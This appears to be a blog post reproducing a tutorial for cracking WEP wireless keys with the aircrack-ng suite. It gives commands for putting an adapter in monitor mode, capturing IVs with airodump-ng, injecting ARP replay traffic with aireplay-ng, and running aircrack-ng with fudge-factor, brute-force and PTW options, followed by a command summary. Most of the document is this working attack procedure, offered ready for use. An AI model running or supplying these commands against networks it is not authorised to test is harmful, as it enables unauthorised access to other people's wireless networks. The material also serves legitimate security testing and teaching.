Step #1: bash# iwconfig #to list wifi interfaces
bash# airmon-ng #to check the adapter status.
bash# airmon-ng stop eth1 #to stop the interface
bash# airmon-ng start eth1 #start wifi interface in monitor mode
Step #2:
bash# airodump-ng --ivs --write capturefile eth1 #write down channel, bssid, client (station) mac address
Step #3:
bash# airodump-ng --ivs --channel [AP channel] --bssid [AP BSSID] --write capturefile eth1 #to start capturing IVs
Step #4:
bash# aireplay-ng --arpreplay -b [AP BSSID] -h [client MAC from airodump] eth1 # to generate ARP traffic
Step #5:
bash# aircrack-ng -b [AP BSSID] [capture file(s) name] # to perform the crack
Aircrack uses a combination of statistics and brute force to crack WEP keys. This excerpt from the aircrack page explains:
The idea is to get into the ball park with statistics then use brute force to finish the job. Aircrack-ng uses brute force on likely keys to actually determine the secret WEP key.
This is where the fudge factor comes in. Basically the fudge factor tells aircrack-ng how broadly to brute force. It is like throwing a ball into a field then telling somebody to ball is somewhere between 0 and 10 meters (0 and 30 feet) away. Versus saying the ball is somewhere between 0 and 100 meters (0 and 300 feet) away. The 100 meter scenario will take a lot longer to search then the 10 meter one but you are more likely to find the ball with the broader search. It is a trade off between the length of time and likelihood of finding the secret WEP key.
For example, if you tell aircrack-ng to use a fudge factor 2, it takes the votes of the most possible byte, and checks all other possibilities which are at least half as possible as this one on a brute force basis. The larger the fudge factor, the more possibilities aircrack-ng will try on a brute force basis. Keep in mind, that as the fudge factor gets larger, the number of secret keys to try goes up tremendously and consequently the elapsed time also increases. Therefore with more available data, the need to brute force, which is very CPU and time intensive, can be minimized.
The command with fudge factor of 4 added was:
aircrack-ng -f 4 -b 00:06:25:B2:D4:19 capturefile*.ivsThe good news was that it got us past the "attack failed" message. The bad was that it didn't find the key after about 10 minutes.
The second run used the approach of "if a little is good, more is better", and doubled the fudge factor to 8, even though the suggested 30 minutes of aircrack run hadn't elapsed. That, too, ran for awhile, but also failed to nail the key.
The third run combined the fudge factor of 8 with the -x2 option to brute force the last two keybytes instead of just the default of the last keybyte. The command was:
aircrack-ng -f 8 -x2 -b 00:06:25:B2:D4:19 capturefile*.ivsand was actually the command line used to get the successful run shown in Figure 10.
All of the above tricks came from the aircrack-ng Usage Tips:General approach to cracking WEP keys section, which you definitely should visit if you find yourself unable to crack a key even having the suggested number of IVs.
We also tried the PTW attack, to see if it really was that much faster. Figure 12 shows that PTW really does perform as advertised!
Figure 12: aircrack 0.9.1 using the PTW attack
It took airodump-ng under a minute to capture the 38,721 IVs and aircrack-ng 0.9.1 under a minute more to find the key. Aircrack actually found the key almost instantly after startup once it had enough IVs. The 55 seconds shown in Figure 12 came from starting aircrack-ng after only around 5,000 IVs had been captured.
Command Summary
All commands are entered as a single line.
Switching into monitor mode with airmon-ng airmon-ng stop [WLAN adapter] |
Wireless survey with airodump-ng airodump-ng --ivs --write [capturefile prefix] [WLAN adapter] Wireless survey with airodump-ng 0.9.1 for PTW airodump-ng --write [capturefile prefix] [WLAN adapter] |
IV capture with airodump-ng airodump-ng --ivs --channel [AP channel] --bssid [AP BSSID] --write capturefile [WLAN adapter] IV capture with airodump-ng 0.9.1 for PTW airodump-ng --channel [AP channel] --bssid [AP BSSID] --write capturefile [WLAN adapter] |
aireplay-ng with ARP replay aireplay-ng --arpreplay -b [AP BSSID] -h [client MAC from airodump] [WLAN adapter] |
WEP crack with aircrack-ng aircrack-ng -b [AP BSSID] [capture file(s) name]*.ivs WEP crack with aircrack-ng and fudge factor 4 aircrack-ng -f 4 -b [AP BSSID] [capture file(s) name]*.ivs WEP crack with aircrack-ng, fudge factor 8, brute force last two keybytes aircrack-ng -f 8 -x2 -b [AP BSSID] [capture file(s) name]*.ivs WEP crack with aircrack-ng 0.9.1 and PTW method aircrack-ng -z -b [AP BSSID] [capture file(s) name]*.cap |
No comments:
Post a Comment